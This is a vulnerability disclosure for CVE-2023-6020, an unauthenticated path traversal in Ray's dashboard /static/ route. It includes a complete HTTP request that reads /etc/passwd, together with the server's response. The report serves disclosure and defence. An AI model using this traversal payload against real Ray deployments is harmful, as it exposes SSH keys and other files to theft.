CVE-2023-6020: LFI in Ray API - GET /static/ in ray

Description

Local file include allows remote attackers to make an unauthenticated API call and read any file on the system, such as SSH keys.

Proof of Concept

GET /static/js/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: localhost:8265
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8265/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Etag: "174880dae894b157-2020"
Last-Modified: Thu, 02 Mar 2023 04:48:59 GMT
Content-Length: 8224
Accept-Ranges: bytes
Date: Thu, 24 Aug 2023 23:01:58 GMT
Server: Python/3.8 aiohttp/3.8.5
Connection: close

##
# User Database
# 
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
[...]

Impact

Allows attackers to read any file on the server depending on the permissions Ray was run with.

Occurrences